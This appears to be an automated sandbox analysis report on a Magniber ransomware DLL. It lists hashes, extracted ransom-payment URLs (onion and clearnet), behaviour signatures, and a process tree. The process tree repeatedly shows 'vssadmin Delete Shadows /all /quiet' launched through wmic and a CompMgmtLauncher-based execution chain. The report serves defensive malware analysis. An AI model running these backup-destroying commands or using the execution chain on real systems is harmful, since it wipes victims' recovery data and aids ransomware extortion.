Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
25-02-2024 13:29
General
-
Target
a3e7152abd213f303c1561aa20ed9cea.dll
-
Size
38KB
-
MD5
a3e7152abd213f303c1561aa20ed9cea
-
SHA1
0cfb6ac5f567c4dd3e9ebe741c2b8b0e19cb243e
-
SHA256
8ab78bc8884b9de573a3dc19e7fc206e925f643aee3f152d19e8d1caa90b6312
-
SHA512
854dad9d639cb4c9860c7dcd2d1bb7204ce3efe0a5bc0521d37a61e7ef3787a8334620d718ec2abdbbd077122c008273ce29cf1382af45d8411c431f5cf2e777
-
SSDEEP
768:bL2WWrr4WdC5pqndJgr8q39GGL3RqL9Q1VW028JQyt3uh11yCg:GdC5pqndJIHtGCE9Q1rRxIM
Malware Config
Extracted
C:\Users\Admin\Pictures\readme.txt
magniber
http://62b0e2386eb4e6a07sabwrkkob.grv4f55lyxu36y26o4orfzy7vmwiljcruko6r7q4tatxvjugg4j66lid.onion/sabwrkkob
http://62b0e2386eb4e6a07sabwrkkob.hesmust.top/sabwrkkob
http://62b0e2386eb4e6a07sabwrkkob.salecup.club/sabwrkkob
http://62b0e2386eb4e6a07sabwrkkob.tietill.space/sabwrkkob
http://62b0e2386eb4e6a07sabwrkkob.hegame.xyz/sabwrkkob
Signatures
-
Detect magniber ransomware 2 IoCs
-
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 12 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (84) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Suspicious use of SetThreadContext 4 IoCs
-
Interacts with shadow copies 2 TTPs 8 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Modifies Internet Explorer settings 1 TTPs 34 IoCs
-
Modifies registry class 11 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious behavior: MapViewOfSection 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 7 IoCs
-
Suspicious use of SendNotifyMessage 3 IoCs
-
Suspicious use of SetWindowsHookEx 6 IoCs
-
Suspicious use of UnmapMainImage 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
-
-
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\a3e7152abd213f303c1561aa20ed9cea.dll,#12⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"4⤵
-
-
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵
-
-
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
-
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\notepad.exenotepad.exe C:\Users\Public\readme.txt2⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\wbem\wmic.exeC:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"2⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\cmd.execmd /c "start http://62b0e2386eb4e6a07sabwrkkob.hesmust.top/sabwrkkob^&2^&39869849^&84^&359^&12"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://62b0e2386eb4e6a07sabwrkkob.hesmust.top/sabwrkkob&2&39869849&84&359&123⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2640 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵
-
-
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
-
C:\Windows\system32\cmd.execmd /c CompMgmtLauncher.exe1⤵
- Process spawned unexpected child process
-
C:\Windows\system32\CompMgmtLauncher.exeCompMgmtLauncher.exe2⤵
-
C:\Windows\system32\wbem\wmic.exe"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"3⤵
-
-
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
344B
MD5d05a9540247d65d68a253fbb6df7c36d
SHA11be2b302973af9dab26601f9cf86d908a0923961
SHA2569e6a859d4ca8b4be40d0c3817f441f353fdfd2cc1fc03c1ff2576c20fb8cd732
SHA5127046af148b9e049557a992937e9757475b2cf296a5654e17f2d175a31daa07333c1a29fe6e3937c3c760de9346fedb17be6616d1a33a072e26b122cd1b51ef66
-
Filesize
344B
MD59d1927137114849b52ecbeb63aa6d180
SHA1ce10f3c509a8254c4fdd6efde5aa10152c5891ed
SHA256396038246d3b977acdd83f1dfbee0c0ca982c5fc11f885e6a9757ba52295641b
SHA512abc10a3afa99acb20f50741d057b8df27760b41a5cf7cd366dc3466974322f1635e09f9c9e44cd42891cadb8365c8f97f71812dedf8b4793effa5352f9360fa2
-
Filesize
344B
MD5a998b10e47631f2a9ea3517e454b66bf
SHA113dcfd6e7dcc09a63277f901198a97f8de8faa9b
SHA25601868e391db7ad533f682871a6be27014e9eb845a3ba7012b03c6428f01278bd
SHA51201063e6e92b82489301c6f86a968d966f331e68eff9120789d2b558f8db5dd4e71f9ef8535569815b39f5ae01bfdfe9fc6a1e6a3dab73b2b338130ee040def5a
-
Filesize
344B
MD5648f3bc33f3cc9179015760764292060
SHA1645d0a53ae3692007e62350da1fe4d6f43461b2f
SHA256e542137fe1509ac37f5a6d0c097c580fc0e9ca61d421163b378ffe9a520421ee
SHA512c1c288295d8bc628991247466951596694060611de144b3989e7e66e7dca5b366fa44382d56f87abb5f353e582f6411c637d014993992a390895880e1113d667
-
Filesize
344B
MD581ce3c941cf251ef39580e119d6cc795
SHA19c19dd70885d26cd2af58862310f34ce95e1bd96
SHA25662bf7396212e9172fdd45f75ddc6fec5264e186755b511822ae05ef1a44b8929
SHA5129307aeaac45d48e840777d4bb9635e534bcef2a3264f098b37c196bcbb6d8d886bbb6499a58884325f347fdfe9db3daafbdc8aac8366882c67bec1b0139056b1
-
Filesize
344B
MD5a257b054d2caa8eac991780e410aec11
SHA1c571f121e00dadded443de42d3aa3dc33affb980
SHA256da9eab9cba9c9b1926d2be83a3661cfdc863784e44f8de5a2743717e58c26599
SHA51294e58e524dbf95364bc131a6507292be06fefe649d06edf9c20c570c5a2fc66c45051e5743c92b1678b8b4b9f2551e8c9c21b393741351a76ad6788b8e3f7b8b
-
Filesize
344B
MD516452d6789264a18871c6488feaf22a6
SHA1cc30345e16f8b7c43cf2546d1175a5831726ba9f
SHA256e1bcea853a2c17d0902cb47cc2a97734ebe650031d9006773e5ef5b8f00ede39
SHA5123ea8062007a916d7d31ce8c593baceebd06053276a68fd58350cb73f1a1aff1a6f8bbc289a32395048bd1bd9f0aff7ab999b40de4b62149c3feae7a810f4384c
-
Filesize
344B
MD52d215ba9fad48d225152ebbfe1c76c62
SHA1532b045c705e1d3f5595d68931e338f751b2f4b2
SHA256681308853f38a0c765ca0697997ef8bb0da7552dd1caa371a750e85f3777270e
SHA5125bc87f76a59af269a05850f89827ea3d3bc9652282813d230454465cc194f2f10f9313a50fd9adacba85daf8370dd29c199975492fb56b6d3b707fb9bae56d2e
-
Filesize
344B
MD5a298e864176fc647f81cb9122da70e71
SHA12ff4474cb52aeb85d7177f5f8db57040315e7141
SHA256a346f5086cffbc30915198cc9737c3463ca271344aa235bdaf7a0f90f1fc519a
SHA5125647ee69c33058e6fa91515ed59bb3bf87d1b901dc105cccc5bdd5ec897308e4699ab3f84973b28f172cbedbdbe94f4393bb288c7cd4383433531ab36940951d
-
Filesize
344B
MD574ab1eabf90272f36c66674678a0fefc
SHA1b6e11ca6930a500a4888ba366d096537b35d9b15
SHA256227cc89c4597cac8cb7ed2e3e0c89683333729eff43764223cdcc2bbeb289ac8
SHA512da758777587db25913c3b4c0e6bc979e43ae609c4439afaa61f0913c7a1927115564e8275426aa87cf57ca6b685e7adfd9bcd0dd4da279cb6a387061e05e6f05
-
Filesize
344B
MD5687761ae4be8a8485e663c13eeee0a5e
SHA1da82ec34092e380b1539e27947ba0a5c6d6b3a06
SHA256983be2e32157d5261d9f503f81d3e77ba13629970bc9127900d298401ea93842
SHA51286affe953e4c34419feb801c9d22465f5425bad4aa9600bf22ade50eb137672118b41916814bf85a16682831117ed760965d124d296e44ad013c654bc007c5fc
-
Filesize
344B
MD5cb56973d65eeaf6ff39966728abfd6fd
SHA18789a165416fa409615b260a6f232f89514b8317
SHA256e1e0dd38a29863e19a07e0b5a9a2243c9280f0edc53292cb191a1188121f21d4
SHA512185a0cd735b366528478cce225f81ae4b03e0dd544e7c368cc590914326789ea703178544f9f28b714eea7fd979b6a76be81c009144ce5e2a634f33c66156644
-
Filesize
344B
MD5ca8cb12723c97bc16065154adf51e715
SHA119a767538dc672f69ae2222f2d9bd745cb0d9335
SHA256bd2dc72f9b4f1054bd37e320608da806197f34414ee9117b6e2429f712ac5ae6
SHA512c64bd3ffd1c75b758f8370c38db5be27a87e4ad005fc26b75775381d59449adaf5fc8167c7220c9af23af764f9de458f5a0609d3615f0f9e9c1f500d1e23620c
-
Filesize
344B
MD5e3b342133a532130276dc12b7c89d7ef
SHA1e7c316a189b10c0a0c8c4e1244805cbf0650b43c
SHA256d89e829a7eeeb9614622b3e106db16376807c8b837ad3c44edb48751e163f282
SHA51249d34f387ece89b9d5c1f5a1448b6ca1643f955d4477472bf203a52fa9934bddca55af4d765c783bbb5afd1fe22bdc687732a069b8d4d3e912a100a593dcfd7f
-
Filesize
344B
MD5a1be91b290c5011b47488dea17e90de5
SHA1ccc3043f71ee92bfabe536a3b8fce5ff6dee3c80
SHA256dc5e237032e08dbc9a9e42283b02efc389008afe4c0a9567bdce62aa6f517d56
SHA5123fb1fd2703fc492df7df96f039fd54a9a71070ea52712074ee4edc90cf2d28f6145089573bacf13d96ea881329cc067a8b98e1aaa7cc98f00743410760582af0
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
Filesize
1KB
MD5b3fe453bcb5e29fabe2ecdb6de545882
SHA11749b2bb7c0c8c3d493d5ada133f825ce48ab847
SHA256f1bcdefb54fb94a3b646a8bf5bf93daaf4b6a1faefaa89373522bf2701abffcf
SHA5124ed76b8b55aaa966aa055c9bb4aa88d66467b057f2753f6c074683fdc637c97e585391afcdf369fb4bb16400bae6c6bbf3d9dec8a445e72998cb9e2dad2c4065
-
Filesize
20KB
-
Filesize
20KB
-
Filesize
4KB
-
Filesize
6.3MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB